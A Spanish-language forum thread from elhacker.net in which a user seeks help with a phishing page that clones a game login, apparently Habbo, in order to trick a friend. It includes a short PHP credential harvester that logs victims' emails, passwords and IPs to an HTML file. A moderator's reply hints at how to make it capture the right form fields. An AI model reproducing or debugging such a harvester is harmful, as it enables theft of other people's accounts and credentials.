elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  experimento de phishig fallido
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: experimento de phishig fallido  (Leído 4,601 veces)
XxELIT3xX

Desconectado Desconectado

Mensajes: 2


Ver Perfil
experimento de phishig fallido
« en: 9 Enero 2015, 23:33 pm »

 Hola a todos amigos, este es mi primer post en este foro, aunque os llevo leyendo desde hace mucho tiempo pero hoy he decidido lanzarme a preguntar una pregunta.
Resulta que mi amigo y yo decidimos hacerle una broma a otro amigo, pero investigando nos topamos con eso del phishing e investigamos.Una vez sabiamos que era eso decidimos ponerlo en practica para saber si era cierto que existia una forma do clonar una pagina de una forma tan real, lo probamos entre nosotros en un JUEGO cosa que supongo que si lo hacemos con el consentimiento de los 2 no ocurre nada...
bueno pues, una vez teniamos el index.html y el post.php o login.php (el nombre cambiaba porque probabamos con todos los php que veiamos de videos de como hacer phishing en facebook sin hacerlo a facebook, solo cogiendo el php para luego usarlo hacioendo el phishing entre nosotros con la pagina del juego)el php que tenemso actualmente crea un archivo html (passw0rds14.html) en el servidor que podemos ver.bueno, hosteamos el server en hostinger, lo subimos con filezilla, lo poniamos en practica pero no cogia los datos...
lo que cogia era la ip solo, dejando esta secuencia:

Email: [] Password: [] IP: [XX.XXX.XXXXXX]

la IP si que me la registra (la tapo porque es la del ordenador de mi amigo jejej)
pero luego me fije en algo... el php que cogimos de videos de hacer phishing a facebook tenia la siguiente secuencia:

Código
  1. <?php
  2.  
  3. $habbo = $_POST['email'];
  4.  
  5. $password = $_POST['pass'];
  6.  
  7. $ip = $_SERVER['REMOTE_ADDR'];
  8.  
  9. $f = fopen("passw0rds14.html", "a");
  10.  
  11. fwrite ($f, 'Email: [<b><font color="#0000FF">'.$habbo.'</font></b>] Password: [<b><font color="#FF0040">'.$password.'</font></b>] IP: [<b><font color="#FE2EF7">'.$ip.'</font></b>]<br>');
  12.  
  13. fclose($f);



SIN ESPACIOS (no se si tendra algo que ver, pero yo aclaro...)
bueno, si os fijais tiene

Código
  1. $habbo = $_POST['email'];
  2.  
  3. $password = $_POST['pass'];
  4.  
  5. $ip = $_SERVER['REMOTE_ADDR'];

que seria para captar el email, la pass, y la ip.
pero el juego lo que pide para loguearse es USER, no email... asi que no se si
$habbo = $_POST['email'];  es lo que falla ahi... pero de todas formas solo falla eso, la contraseña si que me la pide el juego, sin embargo el php tampoco me capta la pass...

¿es $habbo = $_POST['email'];  lo que esta fallando?  :huh:
PD:si, he editado el index.html cambiando lo siguient de las palabras action y he puesto el login/post.php

ayudenme pls

insisto que no es con fines malos, de hecho creo que voy a empezar en esto del hacking etico creo que se llama, ya que me ha llamado muchisimo la atencion como existen este tipo de paginas fraudulentas tan... EXACTAS a las deverdad.

FELIZ AÑO NUEVOOOO JEJEJEJ  :rolleyes:

« Última modificación: 9 Enero 2015, 23:37 pm por engel lex » En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: experimento de phishig fallido
« Respuesta #1 en: 9 Enero 2015, 23:40 pm »

Modifiqué el post, por favor cuando publiques codigo, usa las etiquetas GeSHi

eso no se hace a ciegas... necesitas ver el form que hace el post en el primer html para saber que dato capturar de los pasados...
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
tywors

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: experimento de phishig fallido
« Respuesta #2 en: 20 Febrero 2016, 16:56 pm »

Phishing a Habbo en 2016?  :rolleyes:
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Intento fallido
Ejercicios
corrius 1 3,865 Último mensaje 17 Febrero 2006, 23:50 pm
por corrius
fallido intento de subtitular..
Multimedia
MasterPM2 9 5,310 Último mensaje 5 Enero 2010, 02:40 am
por Songoku
(Solucionado) Intento fallido al usar FSO... xD
Programación Visual Basic
SuperDraco 2 3,623 Último mensaje 16 Julio 2011, 04:05 am
por SuperDraco
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines